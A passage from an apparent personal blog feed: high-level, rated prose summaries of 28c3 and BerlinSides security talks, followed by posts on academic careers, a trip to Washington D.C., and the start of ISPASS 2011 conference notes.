style. The hacking area was never as crowded as in earlier years,
and the hackers are moving more and more towards software only. Well,
nevertheless we had to try out the lounge/tent on the first day and were
thrown out at around 4am. That was another novelty: for the first time
the bcc (or parts of the congress) closed during the night.
The following four days went by in a blur. I watched many interesting
talks, met many interesting people, had good discussions, had a blast
during my talk, and had the one-odd beer or so. I organized the
interesting talks into three categories: technical talks, political/social
talks, and talks that I would have liked to watch. The talks are
ordered according to my subjective rating on a scale from 1 to 10.&lt;/p&gt;
&lt;div class="section" id="technical-talks"&gt;
&lt;h2&gt;Technical talks:&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4817.en.html"&gt;String Oriented Programming, Mathias Payer (my talk)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Mathias first gives an overview of all the different attack vectors that
are currently used in exploits (code injection, return oriented
programming, jump oriented programming, and format string attacks). He
then discusses the available defenses on current systems (Data Execution
Prevention, Address Space Layout Randomization, and ProPolice). Using a
tool that emits specially crafted format strings he presents an attack
that can be used to rewrite some static regions of a program (e.g., GOT,
or PLT regions of the main executable) into a jump/return oriented
interpreter that reuses parts of the application to execute arbitrary
code.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4780.en.html"&gt;Print Me If You Dare, Ang Cui, Jonathan Voris (8)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Ang et al. present an awesome hack that lets you upload your own malware
to regular HP printers. Current HP printers are connected to the
network, have fairly powerful processors, and can be updated (without
authentication) over the Internet. The talk includes a live demo. Great
presentation!&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4732.en.html"&gt;Datamining for Hackers, Stefan Burschka (7+)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Stefan gave a great talk about the potential of datamining and how
datamining can be used to exploit and analyze legacy systems. Stefan
talks about traffic mining where he exclusively looks at traffic
patterns and unencrypted fields in the headers (e.g., length, flags) to
infer details of the encrypted connection (e.g., pauses, which party is
speaking, and other details). All in all an entertaining talk with
medium level of details and verbosity.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4766.en.html"&gt;802.11 Packets in Packets, Travis Goodspeed (and Sergey Bratus) (7)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Travis and Sergey talk about and introduce probabilistic packet
injection. If the wireless signal is congested in one way or another or
if there are interferences then the transmission of a packet can be
incomplete. The main idea of the hack is that a part of the original
(legit) packet is destroyed during the transmission. The data section of
the packet now contains a complete inner packet of the same protocol. If
the header of the original packet is destroyed then the inner packet is
parsed like a regular packet. This hack can be used to inject illegal
packets into protected networks (e.g., somebody downloading a large
file; some packets are transmitted wrong and are reinterpreted as
&amp;quot;attack packets&amp;quot; due to the Trojan horse character of the packets). The
idea is really nice, but I doubt that an attacker can win the race a
sufficient number of times against the (very low) probability that only
the header is destroyed and no other part of the data section that
contains the illegal packet. After the talk I actually asked this
question and Travis did not really answer it.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4799.en.html"&gt;Can trains be hacked?, Stefan Katzenbeisser (7)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Interesting talk (in German) about the history of train safety
(including infos on signalling, relays, and so on). Stefan includes
details on &amp;quot;Stellwerken&amp;quot; as well.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4711.en.html"&gt;The Atari 2600 Video Computer System: The Ultimate Talk, Sven Oliver ('SvOlli') Moll (6)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Interesting talk by Sven about all the Atari 2600 internals. Sven was
inspired by Michael Steil's talk at 26c3 about the C64 internals (which
was an awesome talk as well, go watch the recording!). Sven presents a
nice introduction about all the hardware details of the Atari 2600, the
development of ROM/RAM boards, and a lot of nitpicking about programming
the given hardware.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://berlinsides.org/?participant=ange4771"&gt;x86 oddities, corkami (6)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Corkami presents nice subtleties of the x86 machine code. He shows
undocumented instructions, especially how these instructions can be used
in packers and malware to circumvent debuggers, emulators, and other
checking techniques. Very low level talk that assumes a lot of prior
knowledge of x86. Overall very interesting, unfortunately there is no
recording available.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4847.en.html"&gt;Reverse Engineering USB Devices, Drew Fisher (6)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Drew is an MSc student at UC Berkeley in Human Interaction. He talks
about the USB protocol and how to reverse engineer drivers for new USB
hardware.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4688.en.html"&gt;Introducing Osmo-GMR, Sylvain Munaut (6)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Hacking satellite phones. Sylvain introduces a new feature for the Osmo
software stack.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4736.en.html"&gt;Defending mobile phones, Karsten Nohl, Luca Melette (5)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Karsten and Luca show techniques how to clone existing mobile phones
given a regular call that can be eavesdropped. The cloned phones can be
used to call premium numbers or to send text messages to premium
services. After the motivating example they show how the attacks that
Karsten and co. developed during the last couple of congresses can be
mitigated using additional software, additional checks, or new
algorithms. Interesting talk, but the &amp;quot;big hack&amp;quot; was missing. They gave
a great overview of the available attacks but failed to bring up
something new (for this year).&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4811.en.html"&gt;Rootkits in your Web application, Artur Janc (5)&lt;/a&gt; &amp;nbsp;&lt;a class="reference external" href="http://berlinsides.org/?participant=wtikay"&gt;(2nd link)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;A regular XSS bug is used in combination with new HTML5 features to
implement persistent rootkits in web applications. The combination of
persistence and XSS bugs enables rootkits that reinstall themselves even
if caches are cleared. Artur also explains how these rootkits can be
used to grab information and forge, e.g., banking sites.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4761.en.html"&gt;New Ways I'm Going to Hack Your Web App, Jesse Ou, Rich (5)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Similar to Rootkits in your Web application. Featuring HTML5, XSS
attacks, and other nice technologies.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4663.en.html"&gt;Cellular protocol stacks for Internet, Harald Welte (5)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Great overview talk of all the wireless protocols used in the last 20
years. If you want to know more about GSM, UMTS, and all the other
protocols, then go watch this talk to get some pointers. If you are not
interested in an overview, then the talk is just a 1hr show of three
letter acronyms.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4640.en.html"&gt;Time is on my Side, Sebastian Schinzel (5)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Sebastian is a PhD student in Erlangen. He studies side-channel attacks
on web pages. The talk introduces timing analysis, how to get exact
timing measurements, and how to remove jitter. He talks about different
approaches based on TCP/IP to measure jitter for each packet instead
of per connection. If the server side is stacked (PHP over Apache) then
you need domain-specific knowledge: you need to know which parts are
sent by Apache and when control is passed to PHP. Using this domain-specific
knowledge you can reduce the jitter inside the PHP application. The idea
is pretty straightforward: do n measurements, do statistical analysis,
compare, get hidden data. The talk shows an attack on XML RSA encryption
using a timing attack (based on PKCS#1 decryption and a pre-existing attack);
both techniques combined break XML encrypted messages.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4767.en.html"&gt;Security Log Visualization with a Correlation Engine, Chris Kubecka (5)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Solid talk about how to use correlation engines to analyze log files.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4676.en.html"&gt;Apple vs. Google Client Platforms, Bruhns, FX of Phenoelit, greg (4)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;FX and some guys bash about Apple and Google client platforms. They
analyze the hardware platforms of the Google Chromebook (no good
exploits found) and the iPad 1 (some possible exploits similar to
redsn0w found; redsn0w uses a bug in the boot ROM that cannot be fixed by
Apple). They also found some bugs in the markets of Apple and Google.
Both markets are vulnerable to XSS exploits. All in all I expected more
of this talk. The presentation was good but FX was overselling the bugs
they found and in my opinion there was too much bashing around.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://berlinsides.org/?participant=dosbart"&gt;Protecting Software, dosbart (3)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;How to protect legacy software from piracy. So-so talk that ended in a
long rant against piracy and software cracking.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://berlinsides.org/?participant=nicob"&gt;X(tra|ml|slt|query|dp|mas) pwnage, Nicob (3)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Let's just use XSL bugs to inject new code into a server and let's
execute it server side. Nicob includes details on how to transcode
procedural-oriented code into functional-oriented code used by XSL. Talk
was not that interesting as he presented too many details on how to
write code instead of showing individual attacks.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4764.en.html"&gt;Automatic Algorithm Invention with a GPU, Wes Faler (2)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Wes talks about genetic programming and GPU programming. I was not that
interested in the topic of the talk and drifted off pretty soon. In
addition I do not believe that genetic programming or some other
automatic programming techniques will be able to evolve automatically
generated code to very complex/optimized algorithms.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="political-social"&gt;
&lt;h2&gt;Political/social:&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4775.en.html"&gt;Hacker Jeopardy (9)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Jeopardy game show with hacking questions. Awesome just like every year!&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4675.en.html"&gt;„Die Koalition setzt sich aber aktiv und ernsthaft dafür ein“,
maha/Martin Haase (8)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Unfortunately this talk is only available in German. Martin Haase
analyzes the talks of politicians and shows the use (and misuse) of
language. Interesting and funny as usual.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4866.en.html"&gt;Fnord-Jahresrückblick, Felix von Leitner, Frank Rieger (8)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The second political talk that is only available in German. Fefe and
Frank talk about what happened during the year and give a nice &amp;quot;fnord&amp;quot;
review about all the political, social, and other mishaps. Funny and
entertaining, although not the best Fnord show ever.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4901.en.html"&gt;Der Staatstrojaner, 0zapfths, Constanze Kurz, Frank Rieger, Ulf
Buermeyer (7)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The third political talk that is only available in German. The group
reviews the Trojan horse that was developed by Germany to spy on its
people. They analyze both the technical and the political side and give
a great review on the development.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4848.en.html"&gt;The coming war on general computation, Cory Doctorow (6)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Cory discusses the problems with Turing complete CPUs. They can be used
to compute anything. Appliances now want to ensure that only specific
functionality can be executed on these CPUs. This is hard to enforce.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4751.en.html"&gt;The Hack will not be televised?, Caspar Clemens Mierau (6)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;One of the few talks that was not recorded (due to copyright issues -
torrent might be available). Caspar shows different sequences of hacks
in movies. He talks about the hacks and how they are shown on the
screen. I liked the movie sequences but I did not like his takeaways
(e.g., that women are not hackers).&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4832.en.html"&gt;&amp;quot;Neue Leichtigkeit&amp;quot;, Alex Antener, Amelie Boehm, Andrin Uetz, Jonas
Bischof, Ruedi Tobler, Samuel Weniger (6)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Artistic show with lots of booze.&lt;/p&gt;
&lt;p&gt;&lt;a class="reference external" href="http://events.ccc.de/congress/2011/Fahrplan/events/4661.en.html"&gt;SCADA and PLC Vulnerabilities in Correctional Facilities, Tiffany
Rad, Teague Newman, John Strauchs (4)&lt;/a&gt;&amp;nbsp;(&lt;a class="reference external" href="http://berlinsides.org/?participant=teague775"&gt;2nd link&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;New breakthroughs in SCADA systems... More and more people know about
the vulnerabilities in SCADA and PLC systems. These systems are also
used in correctional facilities. Exploits and expertise in these systems
can therefore be used to break out of prisons. Tada.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="what-i-would-have-liked-to-watch"&gt;
&lt;h2&gt;What I would have liked to watch:&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="http://berlinsides.org/?participant=brainsmoke"&gt;So your 0day exploit beats ASLR, DEP and FORTIFY? I don’t care,
Erik Bosman&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Erik would have presented Minemu, a minimal binary translator that
executes full memory taint checking. I read the paper and the work looks
solid, the discussion with Erik was also very interesting. Unfortunately
the talk was canceled due to timing issues.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Conferences"></category><category term="security"></category><category term="hacking"></category><category term="ccc"></category><category term="BerlinSides conference"></category><category term="28c3"></category></entry><entry><title>Academic careers or how to become a professor.</title><link href="/blog/2011/0512-academic-careers-or-how-to-become-a-professor.html" rel="alternate"></link><published>2011-05-12T05:15:00-04:00</published><updated>2011-05-12T05:15:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2011-05-12:/blog/2011/0512-academic-careers-or-how-to-become-a-professor.html</id><summary type="html">&lt;p&gt;&lt;strong&gt;Summary:&amp;nbsp;Have a vision. Stay foolish.&lt;/strong&gt;&lt;/p&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;On May 11th 2011 the &lt;a class="reference external" href="http://www.vmi.ethz.ch/"&gt;VMI&lt;/a&gt;&amp;nbsp;(the organization of the scientific staff at
the CS department at ETH Zurich where I'm currently the president)
organized an informational event on how to start and&amp;nbsp;how to structure
your academic career. If you are pursuing …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;p&gt;&lt;strong&gt;Summary:&amp;nbsp;Have a vision. Stay foolish.&lt;/strong&gt;&lt;/p&gt;
&lt;div class="section" id="introduction"&gt;
&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;On May 11th 2011 the &lt;a class="reference external" href="http://www.vmi.ethz.ch/"&gt;VMI&lt;/a&gt;&amp;nbsp;(the organization of the scientific staff at
the CS department at ETH Zurich where I'm currently the president)
organized an informational event on how to start and&amp;nbsp;how to structure
your academic career. If you are pursuing a PhD then at one point in
time you will think about continuing your academic career by
either becoming a professor or by working at a research lab. Many people,
on the other hand, will turn away from an academic career at a later
point. We asked ourselves what it takes to pursue an academic career,
and what the pros and cons are of becoming a professor vs. working in a
research lab or in industry.&lt;/p&gt;
&lt;p&gt;Three speakers presented their academic careers and told us about their
ideas&amp;nbsp;and how they structured their academic life. An open question
session also&amp;nbsp;allowed the audience to ask personal and detailed questions
why they made&amp;nbsp;individual decisions. &lt;a class="reference external" href="http://las.ethz.ch/krausea.html"&gt;Andreas Krause&lt;/a&gt;, a new assistant
professor at ETH Zurich
gave an impression of the beginnings of an academic career at an
university,&amp;nbsp;&lt;a class="reference external" href="https://www.zurich.ibm.com/~cca/"&gt;Christian Cachin&lt;/a&gt; then talked about working at a
research lab at IBM Research&amp;nbsp;Zurich. The third speaker was &lt;a class="reference external" href="http://graphics.ethz.ch/~grossm/home.php"&gt;Markus
Gross&lt;/a&gt;, full professor at ETH Zurich and&amp;nbsp;head of Disney Research
Zurich.&lt;/p&gt;
&lt;p&gt;In this blog post I try to summarize the information they gave us, but
I'll&amp;nbsp;twist that information with my own thoughts and my own (incomplete)
experience&amp;nbsp;about the topic after being in the PhD program for almost 5
years.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="how-to-evolve"&gt;
&lt;h2&gt;How to evolve&lt;/h2&gt;
&lt;p&gt;It is surprising that many academic careers evolve out of similar roots
and environments. Many academics were big nerds in their teens,
disassembled hardware, and were fiddling around with technology all the
time. This brings back memories from my own youth where I was dumpster
diving for old hardware. I was also well known for disassembling any
electronic hardware I got into my hands. Sometimes I blew the fuses of
our house, but more often than not it seemed to work. At some point this
curiosity comes across its first computer, and the average technology nerd
then tries to figure out how this magical machine works. So all in all,
curiosity and an affinity for electronic hardware appear to be a
good foundation for a future academic career. You have to keep that
curiosity to figure out unknown and unresolved problems and you need to
stay foolish enough to try out things nobody has tried before.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="research"&gt;
&lt;h2&gt;Research&lt;/h2&gt;
&lt;p&gt;Both research labs and universities have their individual advantages
and disadvantages if you are interested in research. At a university
you have absolute freedom in what you research and you are only bound
indirectly by the funding you are able to attract. If you are not able
to attract funding then you are limited in the amount of research you
can carry out. On the other hand, if you work in a research lab then the
boss of that research lab will control in what area you will do research
(so better choose your lab wisely).&lt;/p&gt;
&lt;p&gt;Additionally, one of the biggest differences between academia and
research labs is that research labs are interested in patents. You are
measured by the number of patents you put out, not by the number of
papers that you present at academic conferences. Writing a patent will
take up as much time as writing a scientific paper, including all
revisions.&lt;/p&gt;
&lt;p&gt;One drawback of academia is that research is only a (small) part of your
daily life. Due to teaching lectures, mentoring students, and balancing
other responsibilities, research will only be one of many activities that
you need to worry about. On the other hand, at a research lab you are
able to work full time on your ideas (minus maybe some mentoring overhead
if you are a group leader or a tech lead).&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="funding"&gt;
&lt;h2&gt;Funding&lt;/h2&gt;
&lt;p&gt;If you want to carry out research in academia you need money first. At
some universities there are a few fixed or paid positions per
assistant professor or full professor; additional positions must be
financed through external funding.&lt;/p&gt;
&lt;p&gt;In research labs, on the other hand, you are often bound by project
budgets and you are limited in how much time you can spend on a specific
project until it must pay off.&lt;/p&gt;
&lt;p&gt;So both in academia and in research labs you need to worry to some
extent about money to fund your research.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="lectures"&gt;
&lt;h2&gt;Lectures&lt;/h2&gt;
&lt;p&gt;In academia you need to give lectures as well. Planning lectures and
creating the curriculum takes up a lot of time. If you do not like
teaching then academia is definitely the wrong place for you. Both
professors agreed that they really like teaching and that it is a very
satisfying feeling to work with the
brightest young students and teach them new things.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="building-your-own-group"&gt;
&lt;h2&gt;Building your own group&lt;/h2&gt;
&lt;p&gt;The basic idea is that good people attract other good people. If you are
a good lecturer then you will attract the bright students. If you
publish good results then you will get good postdocs. In addition you
need to approach the good students directly.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="advice-to-kick-start-your-academic-career"&gt;
&lt;h2&gt;Advice to kick-start your academic career&lt;/h2&gt;
&lt;p&gt;Some advice to kick-start your academic career: go for fellowships,
e.g., Microsoft Research, IBM Research, Google, the Yahoo! Key Scientific
Challenges, and governmental fellowships (e.g., SNF, NSF).&lt;/p&gt;
&lt;p&gt;At conferences you should give tutorials and organize interesting
workshops at top conferences. As a (PhD) student you should search for
interesting (research) internship positions at interesting places. This
helps you to build your network of professional mentors that you can draw
on later for reference letters, to meet new people, and to attract funding
and fellowships.&lt;/p&gt;
&lt;p&gt;A drawback of academia is that it is a probabilistic system. There is
no guarantee that if you have x good publications and y good talks and
references then you will get tenure. Always go for new ideas and be the
first or one of the first. Have a vision. Stay foolish.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="time-management"&gt;
&lt;h2&gt;Time management&lt;/h2&gt;
&lt;p&gt;One of the most important factors in an academic career is time management
and resource planning. No matter whether you go for a research position
in a lab or at a university, you need to plan your available time.
Otherwise the combination of all your auxiliary tasks will use up all
your available time and you will have no more time for fun things like
research, teaching, or spending time with your friends and family.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="is-it-worth-it"&gt;
&lt;h2&gt;Is it worth it?&lt;/h2&gt;
&lt;p&gt;From the view of both professors (one halfway into his career, the other
at the beginning of his career) and from my view in front of the PhD
finishing line: absolutely yes. Your mileage may vary, of course.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="resources"&gt;
&lt;h2&gt;Resources:&lt;/h2&gt;
&lt;p&gt;&lt;a class="reference external" href="http://www.cra.org/ads/"&gt;Academic job listings&lt;/a&gt; (watch out for the academic cycle in the US!)&lt;/p&gt;
&lt;p&gt;What They Didn't Teach You in Graduate School (Paul Gray and David E. Drew),
either buy it or get the &lt;a class="reference external" href="http://maya.cs.depaul.edu/~classes/csc426/drewgray.pdf"&gt;PDF&lt;/a&gt;.&lt;/p&gt;
&lt;/div&gt;
</content><category term="Academia"></category><category term="academic career"></category><category term="howto"></category><category term="professor"></category></entry><entry><title>40 hours in Washington D.C.</title><link href="/blog/2011/0418-40-hours-in-washington-dc.html" rel="alternate"></link><published>2011-04-18T10:56:00-04:00</published><updated>2011-04-18T10:56:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2011-04-18:/blog/2011/0418-40-hours-in-washington-dc.html</id><summary type="html">&lt;p&gt;I was on a tight schedule as I only had around 30 hours in Washington
D.C. to see all the major sights. First of all I stayed in the &lt;a class="reference external" href="http://www.hostelworld.com/hosteldetails.php/Downtown-Washington-Hostel/Washington-DC/49367/reviews"&gt;Downtown
Washington D.C. Hostel&lt;/a&gt;, which was great because I could just walk to
Union Station and all the major …&lt;/p&gt;</summary><content type="html">&lt;p&gt;I was on a tight schedule as I only had around 30 hours in Washington
D.C. to see all the major sights. First of all I stayed in the &lt;a class="reference external" href="http://www.hostelworld.com/hosteldetails.php/Downtown-Washington-Hostel/Washington-DC/49367/reviews"&gt;Downtown
Washington D.C. Hostel&lt;/a&gt;, which was great because I could just walk to
Union Station and all the major sights.&lt;/p&gt;
&lt;p&gt;I arrived around 5pm at Baltimore-Washington International Airport. From
there I took the shuttle to the MARC train station and rode to Union
Station (for $6; Amtrak for the same distance was around $60, but would
have been 15 minutes faster). After dropping my bags off at the hostel it
was already getting dark, so I hopped over to see the Capitol by night.
On the way back I walked through Chinatown and got a first impression of
the city. Washington appears to be a small-scale version of New York,
with smaller houses that have a more English touch (brick houses next to
Union Station).&lt;/p&gt;
&lt;p&gt;I started my day in Washington with a big breakfast in Union Station,
then went to the &lt;a class="reference external" href="http://www.aoc.gov/"&gt;Capitol&lt;/a&gt; for the free tour (about 90 minutes
once you are inside), which is absolutely worth it; just be there early! The
rest of the day I meandered through the &lt;a class="reference external" href="http://en.wikipedia.org/wiki/National_Mall"&gt;National Mall&lt;/a&gt; and checked out
all the sights there: the Ulysses Grant Memorial, the National Gallery of
Art sculpture garden, the Washington Monument (really impressive
from close up), the World War II Memorial, the Lincoln Memorial (which I
assumed would be more impressive), the Vietnam Veterans Memorial, and the
White House. On my 6-hour walk I also took tons of pictures of all these
sights. An interesting note is that the National Mall was more or less
deserted in the morning (from 8-10am). It gets more crowded after 10am
when the museums open.&lt;/p&gt;
&lt;p&gt;To combine history and monuments with some technology I went to the
Smithsonian National Air and Space Museum, which is just awesome. It took
me around 3 hours to see all the interesting space capsules, rockets,
and airplanes. The museum gives you great details about everything
man-made that flies and is absolutely worth a visit if you are even a
little bit of a tech geek. The second museum I visited was the National
Museum of Natural History, which had great exhibits showing the
evolution of mankind in particular and of mammals and animals in
general.&lt;/p&gt;
&lt;p&gt;Combining two museum visits and all the other sights in one day was a
lot, so I headed over to 7th Street and H Street NW for dinner in
Chinatown, where I got good pho (a Vietnamese noodle soup with beef
in it), and then headed to the movies to relax. All in all it was a great
day with perfect weather to visit all the outdoor attractions, and I had
lots of fun.&lt;/p&gt;
&lt;p&gt;On the next morning I only had a couple of hours to kill before getting
the shuttle to the airport, so I headed over to the Library of
Congress and checked out the making of the Constitution and all the
other interesting artifacts they have on display. If you are a bookworm
or interested in US history then the Library is worth a visit!&lt;/p&gt;
&lt;p&gt;I flew out from Dulles International Airport and booked a
&lt;a class="reference external" href="http://www.supershuttle.com/"&gt;Super Shuttle&lt;/a&gt; to get me there. I had already booked them a couple of
times and it usually works out pretty well. But this time I got screwed
over twice. First of all, I made a mistake on my reservation, putting 506
H Street NW instead of 506 H Street NE on the form. The shuttle driver
just went to the wrong part of the city and did not even bother to call
me. After waiting on the street during the pickup window I waited for 10
more minutes in their phone loop until I was told that I had to make a
new reservation and that the money was lost. So I made a new reservation
with the correct address and waited for another 30 minutes. The
second driver did not show up either, so I got screwed twice
and had to beg the hostel owner to drive me to the airport. That worked
out well in the end, as he is an awesome guy and tries to help wherever
he can, but I will never again take Super Shuttle in Washington D.C.!&lt;/p&gt;
&lt;p&gt;So to summarize: Washington D.C. is a great and interesting city where
you can reach all the major attractions by foot. It is one of the
American cities that has a lot of history and is really worth a visit.
Stay in Downtown Washington for the full experience and take public
transport to get around!&lt;/p&gt;
</content><category term="Leisure"></category><category term="travel"></category><category term="Washington D.C."></category><category term="sightseeing"></category></entry><entry><title>Conference remarks: ISPASS 2011</title><link href="/blog/2011/0413-conference-remarks-ispass-2011.html" rel="alternate"></link><published>2011-04-13T13:45:00-04:00</published><updated>2011-04-13T13:45:00-04:00</updated><author><name>Mathias Payer</name></author><id>tag:None,2011-04-13:/blog/2011/0413-conference-remarks-ispass-2011.html</id><summary type="html">&lt;p&gt;As you might know I've been presenting at the &lt;a class="reference external" href="http://ispass.org/ispass2011/"&gt;IEEE ISPASS'11&lt;/a&gt;
conference in Austin, Texas. The conference went from April 10th to
April 12th. If you are interested you can read my ramblings about the
talks below.&lt;/p&gt;
&lt;div class="section" id="conference-information"&gt;
&lt;h2&gt;Conference information&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;(David Brooks &amp;amp; Rajeev Balasubramonian)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;75+ Registrations
64 submissions in total, 4 …&lt;/p&gt;&lt;/div&gt;</summary><content type="html">&lt;p&gt;As you might know I've been presenting at the &lt;a class="reference external" href="http://ispass.org/ispass2011/"&gt;IEEE ISPASS'11&lt;/a&gt;
conference in Austin, Texas. The conference went from April 10th to
April 12th. If you are interested you can read my ramblings about the
talks below.&lt;/p&gt;
&lt;div class="section" id="conference-information"&gt;
&lt;h2&gt;Conference information&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;(David Brooks &amp;amp; Rajeev Balasubramonian)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;75+ registrations; 64 submissions in total, 4 PC reviews per paper,
papers accepted via consensus, 24 accepted papers.&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="keynote-the-era-of-heterogeneity-are-we-prepared"&gt;
&lt;h2&gt;Keynote: The Era of Heterogeneity: Are we prepared?&lt;/h2&gt;
&lt;p&gt;&lt;em&gt;(Ravi Iyer, Intel)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Shift from client/server to smart devices (tablets, smart phones, ...).
Integrate the GPU and IP blocks into the CPU for power efficiency; it's no
longer just about cores but also about the accelerators that we integrate
into the CPU.&lt;/p&gt;
&lt;p&gt;Why heterogeneity? Because the workloads are heterogeneous and one
single solution (a general-purpose core) will not work. Small cores scale
and have good power efficiency; big cores are needed for single-threaded
performance. The talk sounds a lot like ISCA'09 where they proposed a
heterogeneous architecture with one big core and multiple small cores.
Intel's idea: SPECS (Scalability, Programmability, Energy,
Compatibility, Scheduling/Management).&lt;/p&gt;
&lt;p&gt;Questions for cores and accelerators are:
How to mix and prioritize heterogeneous cores? Should all cores have the
same ISA (e.g., SSE)? How should we structure the cache architecture?
Solution for mixed ISAs: use a co-op model and run applications on any
core. If we get an unsupported-opcode exception on the smaller core
then the OS must move the application to the bigger core. This sounds a
little like Albert Noll's VM for the Cell. What about hardware tricks
for context switches?
(Great talk!)&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="session-1-best-paper-nominees-david-christie-amd"&gt;
&lt;h2&gt;Session 1: Best Paper Nominees (David Christie, AMD)&lt;/h2&gt;
&lt;p&gt;&lt;strong&gt;Characterization and Dynamic Mitigation of Intra-Application Cache
Interference&lt;/strong&gt;
&lt;em&gt;(Carole-Jean Wu, Margaret Martonosi, Princeton University)&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Intra-application cache interference is a challenging problem. Measure
and characterize the cache behavior of applications. The paper uses
two-fold measurements: an Intel Nehalem using perfmon2 and a simulated
system in Simics/GEMS. Measurements show that system cache lines are
usually not reused (source: mostly TLB misses), so these lines pollute
the application cache lines.&lt;/p&gt;
&lt;p&gt;They propose new cache systems that account for the fact that cache lines
from a system context are not reused as often as cache lines from a user
context.&lt;/p&gt;
&lt;p&gt;Questions: Measurement done on 64/32b system? Are there differences due
to different page placement?&lt;/p&gt;
